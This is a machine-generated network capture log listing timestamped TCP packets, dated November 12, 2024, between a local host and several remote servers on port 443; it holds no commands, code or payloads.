                                                        Nov 12, 2024 16:27:02.676793098 CET4434974013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:02.676799059 CET4434974013.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:02.677090883 CET49742443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:02.677095890 CET4434974213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:02.679673910 CET49745443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:02.679698944 CET4434974513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:02.679852009 CET49745443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:02.679984093 CET49745443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:02.679996967 CET4434974513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:02.741523981 CET4434974113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:02.741604090 CET4434974113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:02.741862059 CET49741443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:02.741862059 CET49741443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:02.741887093 CET49741443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:02.741895914 CET4434974113.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:02.745249033 CET49746443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:02.745273113 CET4434974613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:02.745409012 CET49746443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:02.745537996 CET49746443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:02.745547056 CET4434974613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:02.770931005 CET44349723159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:02.770952940 CET44349723159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:02.771076918 CET49723443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:02.771091938 CET44349723159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:02.771367073 CET49723443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:02.790116072 CET4434973618.245.31.5192.168.2.6
                                                        Nov 12, 2024 16:27:02.790137053 CET4434973618.245.31.5192.168.2.6
                                                        Nov 12, 2024 16:27:02.790155888 CET4434973618.245.31.5192.168.2.6
                                                        Nov 12, 2024 16:27:02.790163994 CET4434973618.245.31.5192.168.2.6
                                                        Nov 12, 2024 16:27:02.790175915 CET4434973618.245.31.5192.168.2.6
                                                        Nov 12, 2024 16:27:02.790184975 CET4434973618.245.31.5192.168.2.6
                                                        Nov 12, 2024 16:27:02.790208101 CET49736443192.168.2.618.245.31.5
                                                        Nov 12, 2024 16:27:02.790225983 CET4434973618.245.31.5192.168.2.6
                                                        Nov 12, 2024 16:27:02.790283918 CET49736443192.168.2.618.245.31.5
                                                        Nov 12, 2024 16:27:02.790283918 CET49736443192.168.2.618.245.31.5
                                                        Nov 12, 2024 16:27:02.807305098 CET4434974213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:02.807502031 CET4434974213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:02.807631016 CET49742443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:02.807837963 CET49742443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:02.807843924 CET4434974213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:02.811191082 CET49747443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:02.811201096 CET4434974713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:02.811394930 CET49747443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:02.811563015 CET49747443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:02.811573029 CET4434974713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:02.819675922 CET4434973840.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:02.819820881 CET49738443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:02.822555065 CET49738443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:02.822563887 CET4434973840.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:02.822802067 CET4434973840.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:02.824645996 CET49738443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:02.824645996 CET49738443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:02.824661016 CET4434973840.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:02.824945927 CET49738443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:02.871335030 CET4434973840.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:02.887196064 CET44349723159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:02.887219906 CET44349723159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:02.887367964 CET49723443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:02.887386084 CET44349723159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:02.887480021 CET49723443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:02.909683943 CET4434973618.245.31.5192.168.2.6
                                                        Nov 12, 2024 16:27:02.909703970 CET4434973618.245.31.5192.168.2.6
                                                        Nov 12, 2024 16:27:02.909847021 CET49736443192.168.2.618.245.31.5
                                                        Nov 12, 2024 16:27:02.909867048 CET4434973618.245.31.5192.168.2.6
                                                        Nov 12, 2024 16:27:02.910693884 CET49736443192.168.2.618.245.31.5
                                                        Nov 12, 2024 16:27:02.931850910 CET44349723159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:02.931931019 CET44349723159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:02.931953907 CET49723443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:02.932059050 CET49723443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:02.934874058 CET49723443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:02.934890032 CET44349723159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:02.954807997 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:02.954826117 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:02.954938889 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:02.955123901 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:02.955136061 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:03.028250933 CET4434973618.245.31.5192.168.2.6
                                                        Nov 12, 2024 16:27:03.028269053 CET4434973618.245.31.5192.168.2.6
                                                        Nov 12, 2024 16:27:03.028518915 CET49736443192.168.2.618.245.31.5
                                                        Nov 12, 2024 16:27:03.028534889 CET4434973618.245.31.5192.168.2.6
                                                        Nov 12, 2024 16:27:03.028544903 CET4434973618.245.31.5192.168.2.6
                                                        Nov 12, 2024 16:27:03.028620958 CET4434973618.245.31.5192.168.2.6
                                                        Nov 12, 2024 16:27:03.028649092 CET49736443192.168.2.618.245.31.5
                                                        Nov 12, 2024 16:27:03.029737949 CET49736443192.168.2.618.245.31.5
                                                        Nov 12, 2024 16:27:03.029891968 CET49736443192.168.2.618.245.31.5
                                                        Nov 12, 2024 16:27:03.029907942 CET4434973618.245.31.5192.168.2.6
                                                        Nov 12, 2024 16:27:03.054730892 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:03.054742098 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:03.054872036 CET49750443192.168.2.618.245.31.89
                                                        Nov 12, 2024 16:27:03.054899931 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:03.054922104 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:03.055042028 CET49750443192.168.2.618.245.31.89
                                                        Nov 12, 2024 16:27:03.055356026 CET49750443192.168.2.618.245.31.89
                                                        Nov 12, 2024 16:27:03.055375099 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:03.055555105 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:03.055567026 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:03.064273119 CET49751443192.168.2.6192.229.133.221
                                                        Nov 12, 2024 16:27:03.064286947 CET44349751192.229.133.221192.168.2.6
                                                        Nov 12, 2024 16:27:03.064436913 CET49751443192.168.2.6192.229.133.221
                                                        Nov 12, 2024 16:27:03.064590931 CET49751443192.168.2.6192.229.133.221
                                                        Nov 12, 2024 16:27:03.064604044 CET44349751192.229.133.221192.168.2.6
                                                        Nov 12, 2024 16:27:03.073771954 CET4434973840.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:03.074332952 CET49738443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:03.074332952 CET49738443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:03.074343920 CET4434973840.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:03.074551105 CET4434973840.115.3.253192.168.2.6
                                                        Nov 12, 2024 16:27:03.074626923 CET49738443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:03.074626923 CET49738443192.168.2.640.115.3.253
                                                        Nov 12, 2024 16:27:03.092679977 CET49752443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.092708111 CET4434975213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.092813015 CET49752443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.093039036 CET49752443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.093051910 CET4434975213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.111944914 CET49753443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.111974955 CET4434975313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.112127066 CET49753443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.113956928 CET49754443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:03.113964081 CET44349754159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:03.114303112 CET49754443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:03.114303112 CET49753443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.114330053 CET4434975313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.114623070 CET49754443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:03.114633083 CET44349754159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:03.306312084 CET4434974313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.306936979 CET49743443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.306951046 CET4434974313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.307478905 CET49743443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.307482958 CET4434974313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.392230988 CET4434974413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.393279076 CET49744443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.393305063 CET4434974413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.394370079 CET49744443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.394381046 CET4434974413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.424637079 CET4434974513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.425877094 CET49745443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.425878048 CET49745443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.425893068 CET4434974513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.425906897 CET4434974513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.438164949 CET4434974313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.438656092 CET4434974313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.438726902 CET49743443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.438760042 CET49743443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.438760042 CET49743443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.438771009 CET4434974313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.438780069 CET4434974313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.441772938 CET49756443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.441828012 CET4434975613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.441905022 CET49756443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.442054987 CET49756443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.442069054 CET4434975613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.486253977 CET4434974613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.487169981 CET49746443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.487169981 CET49746443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.487194061 CET4434974613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.487206936 CET4434974613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.521413088 CET4434974413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.522146940 CET4434974413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.522202969 CET49744443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.522238016 CET49744443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.522253990 CET4434974413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.522264004 CET49744443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.522269011 CET4434974413.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.526119947 CET49757443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.526145935 CET4434975713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.526237011 CET49757443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.526460886 CET49757443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.526475906 CET4434975713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.555176973 CET4434974513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.555741072 CET4434974513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.555847883 CET49745443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.555876017 CET49745443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.555885077 CET4434974513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.555893898 CET49745443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.555900097 CET4434974513.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.559333086 CET49758443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.559357882 CET4434975813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.559540987 CET49758443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.559750080 CET49758443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.559762955 CET4434975813.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.619102001 CET4434974613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.619349003 CET4434974613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.619400978 CET49746443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.619616985 CET49746443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.619626999 CET4434974613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.619637012 CET49746443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.619641066 CET4434974613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.622837067 CET49759443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.622850895 CET4434975913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.622973919 CET49759443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.623352051 CET49759443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.623368025 CET4434975913.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.666817904 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:03.667037010 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:03.667046070 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:03.668096066 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:03.668160915 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:03.684742928 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:03.684838057 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:03.685106993 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:03.685125113 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:03.727334023 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:03.823534966 CET4434975213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:03.824029922 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:03.824207067 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:03.824230909 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:03.824274063 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:03.824281931 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:03.824330091 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:03.824510098 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:03.824951887 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:03.824980021 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:03.824996948 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:03.825005054 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:03.826226950 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:03.826234102 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:03.867902994 CET49752443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:03.870301008 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:03.870306015 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:03.914843082 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.029742956 CET49752443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.029772043 CET4434975213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.030951023 CET4434975213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.031028986 CET49752443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.032845974 CET49752443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.032926083 CET4434975213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.034854889 CET49752443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.034868002 CET4434975213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.086661100 CET49752443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.138679028 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.139417887 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.139460087 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.139493942 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.139511108 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.139523029 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.139544010 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.140192986 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.140227079 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.140247107 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.140254021 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.140290976 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.140297890 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.141263962 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.141532898 CET49750443192.168.2.618.245.31.89
                                                        Nov 12, 2024 16:27:04.141541004 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.142620087 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.142632961 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.142673016 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.142673969 CET49750443192.168.2.618.245.31.89
                                                        Nov 12, 2024 16:27:04.142704010 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.142710924 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.142719030 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.142750978 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.142765045 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.142771006 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.142832041 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.143188000 CET49750443192.168.2.618.245.31.89
                                                        Nov 12, 2024 16:27:04.143248081 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.143387079 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.143399000 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.143404007 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.143933058 CET49750443192.168.2.618.245.31.89
                                                        Nov 12, 2024 16:27:04.143939018 CET4434975018.245.31.89192.168.2.6
                                                        Nov 12, 2024 16:27:04.144479990 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.144531965 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.144833088 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.144926071 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.145006895 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.145025969 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.145034075 CET44349748159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.145046949 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.145054102 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.145095110 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.145129919 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.145157099 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.145167112 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.145174026 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.145190954 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.145265102 CET4434975313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.145951986 CET49753443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.145968914 CET4434975313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.146928072 CET4434975313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.146992922 CET49753443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.147811890 CET49753443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.147870064 CET4434975313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.147994995 CET49753443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.148001909 CET4434975313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.152774096 CET44349751192.229.133.221192.168.2.6
                                                        Nov 12, 2024 16:27:04.153031111 CET49751443192.168.2.6192.229.133.221
                                                        Nov 12, 2024 16:27:04.153039932 CET44349751192.229.133.221192.168.2.6
                                                        Nov 12, 2024 16:27:04.154445887 CET44349751192.229.133.221192.168.2.6
                                                        Nov 12, 2024 16:27:04.154514074 CET49751443192.168.2.6192.229.133.221
                                                        Nov 12, 2024 16:27:04.156208038 CET49751443192.168.2.6192.229.133.221
                                                        Nov 12, 2024 16:27:04.156289101 CET44349751192.229.133.221192.168.2.6
                                                        Nov 12, 2024 16:27:04.156582117 CET49751443192.168.2.6192.229.133.221
                                                        Nov 12, 2024 16:27:04.156589031 CET44349751192.229.133.221192.168.2.6
                                                        Nov 12, 2024 16:27:04.159943104 CET44349754159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.160273075 CET49754443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.160279989 CET44349754159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.160554886 CET44349754159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.160924911 CET49754443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.160976887 CET44349754159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.161077976 CET49754443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.175436020 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.175473928 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.175513983 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.175520897 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.175532103 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.175555944 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.175837994 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.175865889 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.175882101 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.175889015 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.175961971 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.176301003 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.176641941 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.176671028 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.176701069 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.176711082 CET44349749104.17.25.14192.168.2.6
                                                        Nov 12, 2024 16:27:04.176976919 CET49749443192.168.2.6104.17.25.14
                                                        Nov 12, 2024 16:27:04.196077108 CET49750443192.168.2.618.245.31.89
                                                        Nov 12, 2024 16:27:04.196079969 CET49748443192.168.2.6159.89.194.49
                                                        Nov 12, 2024 16:27:04.196199894 CET49753443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.196201086 CET49751443192.168.2.6192.229.133.221
                                                        Nov 12, 2024 16:27:04.203339100 CET44349754159.89.194.49192.168.2.6
                                                        Nov 12, 2024 16:27:04.259613991 CET4434975213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.259641886 CET4434975213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.259701014 CET49752443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.259706974 CET4434975213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.259828091 CET49752443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.261601925 CET49752443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.261614084 CET4434975213.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.273108959 CET4434975713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.273947954 CET49757443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.273963928 CET4434975713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.274950027 CET49757443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.274955034 CET4434975713.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.278126955 CET4434975613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.278708935 CET49756443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.278723955 CET4434975613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.279460907 CET49756443192.168.2.613.107.246.45
                                                        Nov 12, 2024 16:27:04.279467106 CET4434975613.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.287388086 CET4434975313.107.246.45192.168.2.6
                                                        Nov 12, 2024 16:27:04.287777901 CET4434975313.107.246.45192.168.2.6
